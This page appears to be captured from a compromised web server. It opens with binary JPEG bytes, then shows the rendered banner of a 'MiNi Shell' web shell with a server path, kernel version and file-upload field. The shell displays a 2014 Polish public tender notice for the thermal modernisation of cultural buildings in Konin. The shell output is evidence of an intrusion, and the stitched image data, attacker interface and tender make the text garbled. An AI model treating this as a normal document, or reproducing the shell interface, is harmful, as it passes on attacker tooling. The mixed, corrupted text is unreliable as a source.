JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140527/113477-N-2014.html

<p class="kh_header"><b>Konin: Termomodernizacja budynków Konińskiego Domu Kultury, Młodzieżowego Domu Kultury w Koninie oraz Miejskiej Biblioteki Publicznej w Koninie</b><br>
<b>Numer ogłoszenia: 113477 - 2014; data zamieszczenia: 27.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Koniński Dom Kultury , Plac Niepodległości 1, 62-510 Konin, woj. wielkopolskie, tel. 63 211 31 33, faks 63 242 43 00.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: INSTYTUCJA KULTURY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków Konińskiego Domu Kultury, Młodzieżowego Domu Kultury w Koninie oraz Miejskiej Biblioteki Publicznej w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest termomodernizacja budynków Konińskiego Domu Kultury, Młodzieżowego Domu Kultury w Koninie oraz Miejskiej Biblioteki Publicznej w Koninie obejmujący:

1.1.	CZĘŚĆ I
1)	Wykonanie dokumentacji projektowej termomodernizacji oraz zgłoszenie właściwemu organowi w imieniu Zamawiającego  wykonania robót budowlanych będących przedmiotem zamówienia, tj.:

A) - Koniński Domu Kultury o powierzchni (netto) 4060 m2, w tym:  
termomodernizacja budynku:
a) ocieplenie ścian,
b) ocieplenie stropodachu,

B) - Miejska Biblioteka Publiczna w Koninie o powierzchni (netto) 786,90  m2, w tym:
termomodernizacja budynku:
a) ocieplenie ścian,
b) ocieplenie stropodachu,
c) wymianę drzwi,

C) - Młodzieżowy Domu Kultury o powierzchni (netto) 2.529,40 m2, w tym:
termomodernizacja budynku:
a) ocieplenie ścian,
b) ocieplenie stropodachu,
c) wymianę okien,
d) wymianę drzwi,

2)	Opracowanie dokumentacji powykonawczej.

Dokumentacje projektowe i powykonawcze należy wykonać oddzielnie dla każdego z obiektów.

Projekt zakłada wykonanie następujących prac termomodernizacyjnych w poszczególnych obiektach:
A.	Koniński Dom Kultury:









1)	ocieplenie ścian zewnętrznych sali kinowej, wystających ponad poziom dachu styropianem o gr. 10 cm, opór cieplny R=3,5 (m2*K/W),
2)	ocieplenie stropodachu nad kinem z użyciem styropianu pokrytego papą termozgrzewalną o gr. 12 cm, opór cieplny R=3,96 (m2*K/W),
3)	ocieplenie stropu nad podjazdem nieogrzewanym z użyciem styropianu pokrytego papą termozgrzewalną o gr. 10 cm, opór cieplny R=4,24 (m2*K/W),
B.	Miejska Biblioteka Publiczna w Koninie:
1)	ocieplenie ścian zewnętrznych piwnicy z zastosowaniem styropianu warstwą izolacji o grubości 12 cm spełniającej wymagania oporu cieplnego R>4 (m2*K/W),
2)	ocieplenie ścian zewnętrznych parteru i piętra z zastosowaniem styropianu warstwą izolacji o grubości 10 cm spełniającej wymagania oporu cieplnego R>4 (m2*K/W),
3)	ocieplenie ścian zewnętrznych stropodachu  z zastosowaniem styropianu pokrytego papą termozgrzewalną warstwą izolacji o grubości 8 cm spełniającej wymagania oporu cieplnego R>4 (m2*K/W), 
4)	ocieplenie stropu nad podjazdem nieogrzewanym  z zastosowaniem styropianu pokrytego papą termozgrzewalną warstwą izolacji o grubości 5 cm o oporze cieplnym R=2,17 (m2*K/W), 
5)	wymiana uszczelek w oknach, poprawa montażu okien oraz założenie wywiewników higrosterowanych, likwidacja drzwi garażowych oraz wstawienie w ich miejscu okien o współczynniku U = 1,3,
6)	wymiana drzwi wejściowych na drzwi o współczynniku U=1,5, 
wymiana pozostałych drzwi garażowych (metalowych) na drzwi o współczynniku U=1,
C.	Młodzieżowy Dom Kultury w Koninie:
1)	docieplenie ścian zewnętrznych piwnicy z zastosowaniem styropianu warstwą izolacji o grubości 10 cm, opór cieplny R=4,28 (m2*K/W),
2)	docieplenie ścian zewnętrznych parteru i piętra z zastosowaniem styropianu warstwą izolacji o grubości 9 cm, opór cieplny R=4,96 (m2*K/W),
3)	docieplenie ścian zewnętrznych stropodachu  z zastosowaniem styropianu pokrytego papą termozgrzewalną warstwą izolacji o grubości 10 cm, opór cieplny R=4,69 (m2*K/W),
4)	wymiana drewnianych okien na okna szczelne z nawiewnikami higrosterowanymi automatycznie o współczynniku U = 1,1,
5)	wymiana stolarki drzwiowej (drzwi wejściowe, szklane) na drzwi o współczynniku U = 1,6,
6)	wymiana stolarki drzwiowej (drzwi wejściowe, drewniane) na drzwi o współczynniku U = 1,6.

1.2.	CZĘŚĆ II
1)	Wykonanie dokumentacji projektowej termomodernizacji oraz zgłoszenie właściwemu organowi (w przypadku wymagań wynikających z Prawa Budowlanego) w imieniu Zamawiającego  wykonania robót budowlanych będących przedmiotem zamówienia, tj.:
A) - Koniński Domu Kultury o powierzchni (netto) 4060 m2, w tym:
1) przebudowa systemów grzewczych,
2) system zarządzania energią cieplną
3) wymiana oświetlenia wewnętrznego na energooszczędne;
4) montaż paneli fotowoltaicznych
B) - Miejska Biblioteka Publiczna w Koninie o powierzchni (netto) 786,90  m2, w tym:
1) przebudowa systemów grzewczych,
2) system zarządzania energią cieplną
3) wymiana oświetlenia wewnętrznego na energooszczędne;
4) montaż paneli fotowoltaicznych
C) - Młodzieżowy Domu Kultury o powierzchni (netto) 2627,10 m2, w tym:
1) przebudowa systemów grzewczych na podstawie dokumentacji Zamawiającego 
2) system zarządzania energią cieplną
3) wymiana oświetlenia wewnętrznego na energooszczędne na podstawie dokumentacji Zamawiającego .
4) montaż paneli fotowoltaicznych na podstawie dokumentacji Zamawiającego
2)	Wykonanie robót instalacyjnych;
3)	Opracowanie dokumentacji powykonawczej.

Dokumentacje projektowe i powykonawcze należy wykonać oddzielnie dla każdego z obiektów.


Projekt zakłada wykonanie następujących prac termomodernizacyjnych w poszczególnych obiektach:
A.	Koniński Dom Kultury:








1)	modernizacja instalacji C.O. polegającą na:
a)	 modernizacji central klimatyzacyjnych w zakresie podniesienia ich sprawności wymiany (odzysku) ciepła, w szczególności - zamontowanie wymiennika glikolowego;
b)	montażu wymiennikowego układu glikolowego dla nagrzewnic central wentylacyjnych;
c)	wymianie instalacji C.O. (117 kpl. grzejników) - demontaż i ponowny montaż obudów grzejnikowych wraz z ich naprawą, demontaż instalacji z utylizacją materiałów niebezpiecznych dla środowiska, wykonanie nowej instalacji z montażem zaworów z głowicami termostatycznymi, izolację rurociągów, regulację, próbę, oraz uruchomienie z próbą na ciepło;
d)	montażu systemu zarządzania energią.
2)	zastosowanie nowych, bardziej efektywnych świetlówek kompaktowych z zapłonem elektronicznym, bądź żarówek LED o wyższej sprawności w miejsce tradycyjnych świetlówek i żarówek energooszczędnych,
3)	modernizacja instalacji elektrycznej obiektu, polegająca na zastosowaniu paneli fotowaltaicznych o parametrach: Pmin = 240 Wp

B.	Miejska Biblioteka Publiczna w Koninie:
1)	modernizacja instalacji C.O. polegającą na:
a)	wymianie instalacji C.O. (76 kpl. grzejników) - demontaż i ponowny montaż obudów grzejnikowych wraz z ich naprawą, demontaż instalacji z utylizacją materiałów niebezpiecznych dla środowiska, wykonanie nowej instalacji z montażem zaworów z głowicami termostatycznymi, izolację rurociągów, regulację, próbę, oraz uruchomienie z próbą na ciepło;
b)	montażu systemu zarządzania energią.
2)	zastosowanie nowych, bardziej efektywnych świetlówek kompaktowych z zapłonem elektronicznym, bądź żarówek LED o wyższej sprawności w miejsce tradycyjnych świetlówek i żarówek energooszczędnych,
3)	modernizacja instalacji elektrycznej obiektu, polegająca na zastosowaniu paneli fotowoltaicznych o paramterach: Pmin = 240 Wp.

C.	Młodzieżowy Dom Kultury w Koninie:
1)	modernizacja instalacji C.O. polegającą na:
a)	wymianie instalacji C.O. (88 kpl. grzejników) - demontaż i ponowny montaż obudów grzejnikowych wraz z ich naprawą, demontaż instalacji z utylizacją materiałów niebezpiecznych dla środowiska, wykonanie nowej instalacji z montażem zaworów z głowicami termostatycznymi, izolację rurociągów, regulację, próbę, oraz uruchomienie z próbą na ciepło;
b)	montażu systemu zarządzania energią.
2)	zastosowanie nowych, bardziej efektywnych świetlówek kompaktowych z zapłonem elektronicznym, bądź żarówek LED o wyższej sprawności w miejsce tradycyjnych świetlówek i żarówek energooszczędnych,
3)	modernizacja instalacji elektrycznej obiektu, polegająca na zastosowaniu paneli fotowoltaicznych o paramterach: Pmin = 240 Wp.

Wykonawca będzie obowiązany na każdym etapie wykonywania zamówienia dokonywać uzgodnień i uzyskiwać akceptację Zamawiającego oraz Inwestora Zastępczego. 

Wykonawca zobowiązuje się uzyskiwać niezbędne porozumienia, zgody lub pozwolenia oraz warunki techniczne i realizacyjne związane z realizacją zadania. W ramach projektu planuje się również wykonanie dokumentacji projektowej, wraz z niezbędnymi szkicami i wyrysami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 31.00.00.00-6, 32.00.00.00-3, 44.00.00.00-0, 45.00.00.00-7, 48.00.00.00-8, 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku udziału
w postępowaniu w tym zakresie.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia określonego w części III pkt. 7.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Część I
Warunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej:
1.	dwie roboty budowlane polegające na wykonaniu ocieplenia ścian zewnętrznych budynków użyteczności publicznej lub mieszkalnych wielorodzinnych lub zamieszkania zbiorowego, o wartości co najmniej 250 000,00 złotych brutto każda,
2.	dwie roboty budowlane polegające na wykonaniu ocieplenia dachów lub stropodachów budynków użyteczności publicznej lub mieszkalnych wielorodzinnych lub zamieszkania zbiorowego, o wartości co najmniej 100 000,00 złotych brutto każda.

W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.

Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu określonego w części III pkt 7.2. SIWZ.

Część II
Warunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej:
1.	trzy roboty budowlane polegające na wymianie instalacji centralnego ogrzewania w czynnych budynkach użyteczności publicznej lub zamieszkania zbiorowego lub mieszkalnych wielorodzinnych, obejmujących wymianę instalacji centralnego ogrzewania o wartości co najmniej  200 000,00 złotych brutto każda,
2.	trzy zadania polegające na wykonaniu i uruchomieniu kompleksowego systemu zarządzania energią cieplną w podobnym do przedstawionego w Programie Funkcjonalno Użytkowym  w budynkach o mocy obliczeniowej na potrzeby centralnego ogrzewania powyżej 100 kW każdy,
3.	Trzy zadania dotyczących wymiany w czynnych obiektach instalacji elektrycznych wraz z oświetleniem  o wartości nie mniejszej niż 200 000,00 zł brutto każde.







W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.

Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu określonego w części III pkt 7.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku udziału
w postępowaniu w tym zakresie.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia określonego w części III pkt. 7.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Część I
Warunek ten zostanie uznany za spełniony, jeśli Wykonawca będzie dysponował:
1.	min. 1 osobą, posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej,
2.	min. 1 osobą, posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej,
3.	min. 1 osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.
Zamawiający dopuszcza wskazanie tych samych osób na potwierdzenie spełniania warunku dysponowania osobami w zakresie projektowania, jak i kierowania robotami budowlanymi, jeżeli legitymują się jednocześnie posiadaniem uprawnień budowlanych do projektowania, jak i uprawnień budowlanych do kierowania robotami budowlanymi.

W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.

Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu określonego w części III pkt 7.3. SIWZ.

Część II
Warunek ten zostanie uznany za spełniony, jeśli Wykonawca będzie dysponował:
1.	min. 1 osobą, posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
2.	min. 1 osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
3.	min. 1 osobą, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych
4.	min. 1 osobą, posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych,
5.	min. 2 osobami posiadającymi certyfikat autoryzowanego montera instalacji fotowoltaicznych, obejmujący szkolenie w zakresie: projektowanie systemów fotowoltaicznych, instalowanie i uruchamianie systemów fotowoltaicznych wraz z  konserwacją i serwisowaniem.
Zamawiający dopuszcza wskazanie tych samych osób na potwierdzenie spełniania warunku dysponowania osobami w zakresie projektowania, jak i kierowania robotami budowlanymi, jeżeli legitymują się jednocześnie posiadaniem uprawnień budowlanych do projektowania, jak i uprawnień budowlanych do kierowania robotami budowlanymi.

W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.







Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu określonego w części III pkt 7.3. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunku udziału
w postępowaniu w tym zakresie.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia określonego w części III pkt. 7.1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Formularz oferty -  dla Części I - Załącznik Nr 1.
- dla Części II - Załącznik Nr 1a
- Zestawienie elementów rozliczeniowych - zgodnie z Załącznikiem Nr 2 (Część I) i Załącznikiem Nr 2a (Część II)
- Informacja o zakresie robót powierzonych podwykonawcy, jeżeli ich udział jest przewidziany w realizacji zamówienia - zgodnie z Załącznikiem Nr 7.
- Informacja o Wykonawcach wspólnie ubiegających się o udzielenie zamówienia - Załącznik nr 8.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w zakresie zmiany terminu realizacji przedmiotu umowy, w przypadku wystąpienia którejkolwiek z okoliczności wymienionych poniżej:
1.	z powodu przekroczenia zakreślonych przez prawo lub regulaminy terminów wydania decyzji, zezwoleń, uzgodnień itp., do wydania których organy administracji i instytucje są zobowiązane;
2.	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
3.	z powodu wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie lub przerwanie robót budowlanych w okresie dłuższym niż 7 dni kalendarzowych (dotyczy części I zamówienia);
4.	z powodu okoliczności siły wyższej (np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio Życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach).









W przypadku wystąpienia co najmniej jednej z powyższych okoliczności - termin umowny ulegnie przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu umowy, jednak nie dłuższy niż czas trwania przeszkody.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów, Wykonawca winien poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kdk.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Koniński Dom Kultury. Pl. Niepodległości 1, 62-510 Konin, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 10:45, miejsce: Koniński Dom Kultury. Pl. Niepodległości 1, 62-510 Konin, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




